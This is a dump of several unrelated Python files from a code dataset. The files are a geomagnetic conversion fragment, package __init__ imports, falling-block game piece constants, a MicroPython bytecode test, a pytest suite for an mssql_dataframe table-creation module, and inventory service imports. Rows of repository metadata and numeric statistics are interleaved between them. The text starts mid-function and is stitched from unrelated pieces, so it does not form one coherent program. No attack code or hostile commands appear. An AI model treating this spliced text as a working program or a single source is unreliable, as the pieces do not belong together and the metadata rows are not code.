Dec,Inc,Int=cart2dir(x,y,z) # turn them into polar coordites
B[j][i]=Int*1e-3 # convert the string to microtesla (from nT)
Binc[j][i]=Inc # store the inclination value
Bdec[j][i]=Dec # store the declination value
return Bdec,Binc,B,lons,lats # return the arrays.
| 151.455598 | 30,390 | 0.591072 | 7,253 | 39,227 | 3.194954 | 0.170964 | 0.152937 | 0.220731 | 0.288612 | 0.222241 | 0.16256 | 0.149527 | 0.11371 | 0.103914 | 0.10167 | 0 | 0.58642 | 0.192036 | 39,227 | 258 | 30,391 | 152.042636 | 0.144728 | 0.116935 | 0 | 0.055118 | 0 | 0 | 0.000815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03937 | false | 0 | 0.007874 | 0 | 0.086614 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fec59320a9c1dfb6faa73f5395984acd7ebbd238 | 139 | py | Python | cemba_data/demultiplex/__init__.py | jksr/cemba_data | c796c33a2fd262b2ef893df1951a90b8d0ba9289 | [
"MIT"
] | 4 | 2018-11-13T21:50:57.000Z | 2020-11-25T18:42:57.000Z | cemba_data/demultiplex/__init__.py | jksr/cemba_data | c796c33a2fd262b2ef893df1951a90b8d0ba9289 | [
"MIT"
] | 9 | 2020-10-25T01:58:07.000Z | 2021-06-13T19:17:50.000Z | cemba_data/demultiplex/__init__.py | jksr/cemba_data | c796c33a2fd262b2ef893df1951a90b8d0ba9289 | [
"MIT"
] | 3 | 2018-12-29T23:30:25.000Z | 2020-10-14T18:00:03.000Z | from .plateinfo_and_samplesheet import print_plate_info, make_sample_sheet
from .demultiplex import demultiplex_pipeline, update_snakemake
| 46.333333 | 74 | 0.899281 | 18 | 139 | 6.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071942 | 139 | 2 | 75 | 69.5 | 0.906977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
fed79c24d0e942b5885da91678830398fe9516e2 | 1,774 | py | Python | constants.py | henbr/falling_blocks_game | b7ddb50910e029f8ddd51d62d485dac21984be8d | [
"MIT"
] | null | null | null | constants.py | henbr/falling_blocks_game | b7ddb50910e029f8ddd51d62d485dac21984be8d | [
"MIT"
] | null | null | null | constants.py | henbr/falling_blocks_game | b7ddb50910e029f8ddd51d62d485dac21984be8d | [
"MIT"
] | null | null | null | BASE_SPEED = 20 # Number of frames between moving the piece downward
LEVEL_SPEED_ADJUST = 1 # How much to increase speed for each level
LINES_PER_LEVEL = 10 # How many lines to clear to get to the next level
TILE_SIZE = 8
GAME_WIDTH = 10
GAME_HEIGHT = 20
GAME_TOP_TX = 11
GAME_TOP_TY = 2
GAME_TOP_X = TILE_SIZE * GAME_TOP_TX
GAME_TOP_Y = TILE_SIZE * GAME_TOP_TY
PIECES = [
# J
[[
[0, 0, 0],
[3, 3, 3],
[0, 0, 3],
], [
[0, 3, 0],
[0, 3, 0],
[3, 3, 0],
], [
[3, 0, 0],
[3, 3, 3],
[0, 0, 0],
], [
[0, 3, 3],
[0, 3, 0],
[0, 3, 0],
]],
# L
[[
[0, 0, 0],
[2, 2, 2],
[2, 0, 0],
], [
[2, 2, 0],
[0, 2, 0],
[0, 2, 0],
], [
[0, 0, 2],
[2, 2, 2],
[0, 0, 0],
], [
[0, 2, 0],
[0, 2, 0],
[0, 2, 2],
]],
# T
[[
[0, 0, 0],
[1, 1, 1],
[0, 1, 0],
], [
[0, 1, 0],
[1, 1, 0],
[0, 1, 0],
], [
[0, 1, 0],
[1, 1, 1],
[0, 0, 0],
], [
[0, 1, 0],
[0, 1, 1],
[0, 1, 0],
]],
# O
[[
[1, 1],
[1, 1],
]],
# I
[[
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 1, 1, 1],
[0, 0, 0, 0],
], [
[0, 0, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 0],
]],
# S
[[
[0, 0, 0],
[0, 3, 3],
[3, 3, 0],
], [
[0, 3, 0],
[0, 3, 3],
[0, 0, 3],
]],
# Z
[[
[0, 0, 0],
[2, 2, 0],
[0, 2, 2],
], [
[0, 2, 0],
[2, 2, 0],
[2, 0, 0],
]]
]
| 15.839286 | 72 | 0.26832 | 259 | 1,774 | 1.752896 | 0.19305 | 0.255507 | 0.171806 | 0.105727 | 0.385463 | 0.365639 | 0.310573 | 0.178414 | 0.077093 | 0.037445 | 0 | 0.222607 | 0.511274 | 1,774 | 111 | 73 | 15.981982 | 0.301038 | 0.087373 | 0 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a0ef49791603be5a9470de1d2f12ba93ad10702 | 61 | py | Python | tests/bytecode/mp-tests/listcomp1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/listcomp1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/listcomp1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | x = (a for a in l)
f(a for a in l)
f(a + b for a, b in f())
| 12.2 | 24 | 0.47541 | 20 | 61 | 1.45 | 0.35 | 0.413793 | 0.344828 | 0.482759 | 0.655172 | 0.655172 | 0.655172 | 0 | 0 | 0 | 0 | 0 | 0.344262 | 61 | 4 | 25 | 15.25 | 0.725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a47df3fe0c489f2771ebcbcf58ca6c137d94284 | 25,456 | py | Python | tests/test_core/test_create.py | jwcook23/mssql_dataframe | ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496 | [
"MIT"
] | null | null | null | tests/test_core/test_create.py | jwcook23/mssql_dataframe | ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496 | [
"MIT"
] | 18 | 2021-08-05T19:29:25.000Z | 2022-03-02T16:08:08.000Z | tests/test_core/test_create.py | jwcook23/mssql_dataframe | ba7191e1b159a0b1292bf6825fcdf1fe5ce7c496 | [
"MIT"
] | 1 | 2022-02-08T09:14:56.000Z | 2022-02-08T09:14:56.000Z | from datetime import datetime
import warnings
import pytest
import pandas as pd
import pyodbc
from mssql_dataframe.connect import connect
from mssql_dataframe.core import custom_warnings, conversion, create
pd.options.mode.chained_assignment = "raise"
class package:
def __init__(self, connection):
self.connection = connection.connection
self.create = create.create(self.connection)
self.create_meta = create.create(self.connection, include_metadata_timestamps=True)
@pytest.fixture(scope="module")
def sql():
db = connect(database="tempdb", server="localhost")
yield package(db)
db.connection.close()
@pytest.fixture(scope="module")
def sample():
dataframe = pd.DataFrame(
{
"_varchar": [None, "b", "c", "4", "e"],
"_tinyint": [None, 2, 3, 4, 5],
"_smallint": [256, 2, 6, 4, 5], # tinyint max is 255
"_int": [32768, 2, 3, 4, 5], # smallint max is 32,767
"_bigint": [2147483648, 2, 3, None, 5], # int max size is 2,147,483,647
"_float": [1.111111, 2, 3, 4, 5], # any decicmal places
"_time": [str(datetime.now().time())]
* 5, # string in format HH:MM:SS.ffffff
"_datetime": [datetime.now()] * 4 + [pd.NaT],
"_empty": [None] * 5,
}
)
return dataframe
def test_table_errors(sql):
table_name = "##test_table_column"
with pytest.raises(KeyError):
columns = {"A": "VARCHAR"}
sql.create.table(table_name, columns, primary_key_column="Z")
def test_table_column(sql):
table_name = "##test_table_column"
columns = {"A": "VARCHAR"}
sql.create.table(table_name, columns)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 1
assert all(schema.index == "A")
assert all(schema["sql_type"] == "varchar")
assert all(schema["is_nullable"] == True)
assert all(schema["ss_is_identity"] == False)
assert all(schema["pk_seq"].isna())
assert all(schema["pk_name"].isna())
assert all(schema["pandas_type"] == "string")
assert all(schema["odbc_type"] == pyodbc.SQL_VARCHAR)
assert all(schema["odbc_size"] == 0)
assert all(schema["odbc_precision"] == 0)
def test_table_pk(sql):
table_name = "##test_table_pk"
columns = {"A": "TINYINT", "B": "VARCHAR(100)", "C": "FLOAT"}
primary_key_column = "A"
not_nullable = "B"
sql.create.table(
table_name,
columns,
not_nullable=not_nullable,
primary_key_column=primary_key_column,
)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 3
assert all(schema.index == ["A", "B", "C"])
assert all(schema["sql_type"] == ["tinyint", "varchar", "float"])
assert all(schema["is_nullable"] == [False, False, True])
assert all(schema["ss_is_identity"] == False)
assert schema["pk_seq"].equals(
pd.Series([1, pd.NA, pd.NA], index=["A", "B", "C"], dtype="Int64")
)
assert all(schema["pk_name"].isna() == [False, True, True])
assert all(schema["pandas_type"] == ["UInt8", "string", "float64"])
assert all(
schema["odbc_type"]
== [pyodbc.SQL_TINYINT, pyodbc.SQL_VARCHAR, pyodbc.SQL_FLOAT]
)
assert all(schema["odbc_size"] == [1, 0, 8])
assert all(schema["odbc_precision"] == [0, 0, 53])
def test_table_composite_pk(sql):
table_name = "##test_table_composite_pk"
columns = {"A": "TINYINT", "B": "VARCHAR(5)", "C": "FLOAT"}
primary_key_column = ["A", "B"]
not_nullable = "B"
sql.create.table(
table_name,
columns,
not_nullable=not_nullable,
primary_key_column=primary_key_column,
)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 3
assert all(schema.index == ["A", "B", "C"])
assert all(schema["sql_type"] == ["tinyint", "varchar", "float"])
assert all(schema["is_nullable"] == [False, False, True])
assert all(schema["ss_is_identity"] == False)
assert schema["pk_seq"].equals(
pd.Series([1, 2, pd.NA], index=["A", "B", "C"], dtype="Int64")
)
assert all(schema["pk_name"].isna() == [False, False, True])
assert all(schema["pandas_type"] == ["UInt8", "string", "float64"])
assert all(
schema["odbc_type"]
== [pyodbc.SQL_TINYINT, pyodbc.SQL_VARCHAR, pyodbc.SQL_FLOAT]
)
assert all(schema["odbc_size"] == [1, 0, 8])
assert all(schema["odbc_precision"] == [0, 0, 53])
def test_table_pk_input_error(sql):
with pytest.raises(ValueError):
table_name = "##test_table_pk_input_error"
columns = {"A": "TINYINT", "B": "VARCHAR(100)", "C": "DECIMAL(5,2)"}
primary_key_column = "A"
not_nullable = "B"
sql.create.table(
table_name,
columns,
not_nullable=not_nullable,
primary_key_column=primary_key_column,
sql_primary_key=True,
)
def test_table_sqlpk(sql):
table_name = "##test_table_sqlpk"
columns = {"A": "VARCHAR"}
sql.create.table(table_name, columns, sql_primary_key=True)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 2
assert all(schema.index == ["_pk", "A"])
assert all(schema["sql_type"] == ["int identity", "varchar"])
assert all(schema["is_nullable"] == [False, True])
assert all(schema["ss_is_identity"] == [True, False])
assert schema["pk_seq"].equals(
pd.Series([1, pd.NA], index=["_pk", "A"], dtype="Int64")
)
assert all(schema["pk_name"].isna() == [False, True])
assert all(schema["pandas_type"] == ["Int32", "string"])
assert all(schema["odbc_type"] == [pyodbc.SQL_INTEGER, pyodbc.SQL_VARCHAR])
assert all(schema["odbc_size"] == [4, 0])
assert all(schema["odbc_precision"] == [0, 0])
def test_table_from_dataframe_simple(sql):
table_name = "##test_table_from_dataframe_simple"
dataframe = pd.DataFrame({"ColumnA": [1]})
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(table_name, dataframe)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert len(schema) == 1
assert all(schema.index == "ColumnA")
assert all(schema["sql_type"] == "tinyint")
assert all(schema["is_nullable"] == False)
assert all(schema["ss_is_identity"] == False)
assert all(schema["pk_seq"].isna())
assert all(schema["pk_name"].isna())
assert all(schema["pandas_type"] == "UInt8")
assert all(schema["odbc_type"] == pyodbc.SQL_TINYINT)
assert all(schema["odbc_size"] == 1)
assert all(schema["odbc_precision"] == 0)
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result.equals(dataframe)
def test_table_from_dataframe_datestr(sql):
table_name = "##test_table_from_dataframe_datestr"
dataframe = pd.DataFrame({"ColumnA": ["06/22/2021"]})
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create_meta.table_from_dataframe(table_name, dataframe)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame({
'column_name': pd.Series(['ColumnA','_time_insert']),
'sql_type': pd.Series(['date','datetime2'], dtype='string'),
'is_nullable': pd.Series([False, True]),
'ss_is_identity': pd.Series([False, False]),
'pk_seq': pd.Series([None, None], dtype='Int64'),
'pk_name': pd.Series([None, None], dtype='string'),
'pandas_type': pd.Series(['datetime64[ns]', 'datetime64[ns]'], dtype='string'),
'odbc_type': pd.Series([pyodbc.SQL_TYPE_DATE, pyodbc.SQL_TYPE_TIMESTAMP], dtype='int64'),
'odbc_size': pd.Series([10, 27], dtype='int64'),
'odbc_precision': pd.Series([0, 7], dtype='int64'),
}).set_index(keys='column_name')
assert schema[expected.columns].equals(expected)
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_errorpk(sql, sample):
with pytest.raises(ValueError):
table_name = "##test_table_from_dataframe_nopk"
sql.create.table_from_dataframe(table_name, sample, primary_key="ColumnName")
def test_table_from_dataframe_nopk(sql, sample):
table_name = "##test_table_from_dataframe_nopk"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key=None
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[True, True, False, False, True, False, False, True, True], dtype="bool"
),
"ss_is_identity": pd.Series([False] * 9, dtype="bool"),
"pk_seq": pd.Series([pd.NA] * 9, dtype="Int64"),
"pk_name": pd.Series([pd.NA] * 9, dtype="string"),
"pandas_type": pd.Series(
[
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_sqlpk(sql, sample):
table_name = "##test_table_from_dataframe_sqlpk"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key="sql"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"_pk",
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"int identity",
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[False, True, True, False, False, True, False, False, True, True],
dtype="bool",
),
"ss_is_identity": pd.Series([True] + [False] * 9, dtype="bool"),
"pk_seq": pd.Series([1] + [pd.NA] * 9, dtype="Int64"),
"pandas_type": pd.Series(
[
"Int32",
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_INTEGER,
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([4, 0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
assert pd.notna(schema.at["_pk", "pk_name"])
assert schema.loc[schema.index != "_pk", "pk_name"].isna().all()
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
result = result.reset_index(drop=True)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_indexpk_unnamed(sql, sample):
table_name = "##test_table_from_dataframe_indexpk_unnamed"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key="index"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"_index",
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"tinyint",
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[False, True, True, False, False, True, False, False, True, True],
dtype="bool",
),
"ss_is_identity": pd.Series([False] * 10, dtype="bool"),
"pk_seq": pd.Series([1] + [pd.NA] * 9, dtype="Int64"),
"pandas_type": pd.Series(
[
"UInt8",
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_TINYINT,
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([1, 0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
assert pd.notna(schema.at["_index", "pk_name"])
assert schema.loc[schema.index != "_index", "pk_name"].isna().all()
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_indexpk_named(sql, sample):
table_name = "##test_table_from_dataframe_indexpk_named"
sample.index.name = "NamedIndex"
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, sample.copy(), primary_key="index"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
expected = pd.DataFrame(
{
"column_name": pd.Series(
[
"NamedIndex",
"_varchar",
"_tinyint",
"_smallint",
"_int",
"_bigint",
"_float",
"_time",
"_datetime",
"_empty",
],
dtype="string",
),
"sql_type": pd.Series(
[
"tinyint",
"varchar",
"tinyint",
"smallint",
"int",
"bigint",
"float",
"time",
"datetime2",
"nvarchar",
],
dtype="string",
),
"is_nullable": pd.Series(
[False, True, True, False, False, True, False, False, True, True],
dtype="bool",
),
"ss_is_identity": pd.Series([False] * 10, dtype="bool"),
"pk_seq": pd.Series([1] + [pd.NA] * 9, dtype="Int64"),
"pandas_type": pd.Series(
[
"UInt8",
"string",
"UInt8",
"Int16",
"Int32",
"Int64",
"float64",
"timedelta64[ns]",
"datetime64[ns]",
"string",
],
dtype="string",
),
"odbc_type": pd.Series(
[
pyodbc.SQL_TINYINT,
pyodbc.SQL_VARCHAR,
pyodbc.SQL_TINYINT,
pyodbc.SQL_SMALLINT,
pyodbc.SQL_INTEGER,
pyodbc.SQL_BIGINT,
pyodbc.SQL_FLOAT,
pyodbc.SQL_SS_TIME2,
pyodbc.SQL_TYPE_TIMESTAMP,
pyodbc.SQL_WVARCHAR,
],
dtype="int64",
),
"odbc_size": pd.Series([1, 0, 1, 2, 4, 8, 8, 16, 27, 0], dtype="int64"),
"odbc_precision": pd.Series([0, 0, 0, 0, 0, 0, 53, 7, 7, 0], dtype="int64"),
}
).set_index(keys="column_name")
assert schema[expected.columns].equals(expected.loc[schema.index])
assert pd.notna(schema.at["NamedIndex", "pk_name"])
assert schema.loc[schema.index != "NamedIndex", "pk_name"].isna().all()
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_inferpk_integer(sql):
table_name = "##test_table_from_dataframe_inferpk_integer"
dataframe = pd.DataFrame(
{
"_varchar1": ["a", "b", "c", "d", "e"],
"_varchar2": ["aa", "b", "c", "d", "e"],
"_tinyint": [None, 2, 3, 4, 5],
"_smallint": [265, 2, 6, 4, 5],
"_int": [32768, 2, 3, 4, 5],
"_float1": [1.1111, 2, 3, 4, 5],
"_float2": [1.1111, 2, 3, 4, 6],
}
)
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="infer"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert schema.at["_smallint", "pk_seq"] == 1
assert all(schema.loc[schema.index != "_smallint", "pk_seq"].isna())
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe.sort_index())
def test_table_from_dataframe_inferpk_string(sql):
table_name = "##test_table_from_dataframe_inferpk_string"
dataframe = pd.DataFrame(
{
"_varchar1": ["a", "b", "c", "d", "e"],
"_varchar2": ["aa", "b", "c", "d", "e"],
}
)
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="infer"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert schema.at["_varchar1", "pk_seq"] == 1
assert all(schema.loc[schema.index != "_varchar1", "pk_seq"].isna())
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_inferpk_none(sql):
table_name = "##test_table_from_dataframe_inferpk_none"
dataframe = pd.DataFrame(
{
"_varchar1": [None, "b", "c", "d", "e"],
"_varchar2": [None, "b", "c", "d", "e"],
}
)
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="infer"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert all(schema["pk_seq"].isna())
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
def test_table_from_dataframe_composite_pk(sql):
table_name = "##test_table_from_dataframe_composite_pk"
dataframe = pd.DataFrame(
{"ColumnA": [1, 2], "ColumnB": ["a", "b"], "ColumnC": [3, 4]}
)
dataframe = dataframe.set_index(keys=["ColumnA", "ColumnB"])
with warnings.catch_warnings(record=True) as warn:
dataframe = sql.create.table_from_dataframe(
table_name, dataframe, primary_key="index"
)
assert len(warn) == 1
assert isinstance(warn[0].message, custom_warnings.SQLObjectAdjustment)
assert "Created table" in str(warn[0].message)
schema, _ = conversion.get_schema(sql.connection, table_name)
assert schema.at["ColumnA", "pk_seq"] == 1
assert schema.at["ColumnB", "pk_seq"] == 2
result = conversion.read_values(f'SELECT * FROM {table_name}', schema, sql.connection)
assert result[dataframe.columns].equals(dataframe)
| 36.005658 | 97 | 0.530013 | 2,686 | 25,456 | 4.806776 | 0.074832 | 0.040431 | 0.05809 | 0.037487 | 0.887848 | 0.865618 | 0.811401 | 0.774301 | 0.719851 | 0.696383 | 0 | 0.025549 | 0.33116 | 25,456 | 706 | 98 | 36.056657 | 0.732762 | 0.004871 | 0 | 0.673667 | 0 | 0 | 0.149885 | 0.01844 | 0 | 0 | 0 | 0 | 0.182553 | 1 | 0.03231 | false | 0 | 0.011309 | 0 | 0.04685 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3a5687db17759bdb8914e8b67c3734cdd9bc35b8 | 667 | py | Python | src/spaceone/inventory/service/__init__.py | xellos00/inventory | e2831f2f09b5b72623f735a186264987d41954ab | [
"Apache-2.0"
] | 9 | 2020-06-04T23:01:38.000Z | 2021-06-03T03:38:59.000Z | src/spaceone/inventory/service/__init__.py | xellos00/inventory | e2831f2f09b5b72623f735a186264987d41954ab | [
"Apache-2.0"
] | 10 | 2020-08-20T01:34:30.000Z | 2022-03-14T04:59:48.000Z | src/spaceone/inventory/service/__init__.py | xellos00/inventory | e2831f2f09b5b72623f735a186264987d41954ab | [
"Apache-2.0"
] | 9 | 2020-06-08T22:03:02.000Z | 2021-12-06T06:12:30.000Z | from spaceone.inventory.service.region_service import RegionService
from spaceone.inventory.service.server_service import ServerService
from spaceone.inventory.service.collector_service import CollectorService
from spaceone.inventory.service.job_service import JobService
from spaceone.inventory.service.job_task_service import JobTaskService
from spaceone.inventory.service.cloud_service_type_service import CloudServiceTypeService
from spaceone.inventory.service.cloud_service_service import CloudServiceService
from spaceone.inventory.service.cleanup_service import CleanupService
from spaceone.inventory.service.resource_group_service import ResourceGroupService
| 66.7 | 89 | 0.905547 | 77 | 667 | 7.662338 | 0.311688 | 0.183051 | 0.320339 | 0.427119 | 0.240678 | 0.135593 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053973 | 667 | 9 | 90 | 74.111111 | 0.935024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
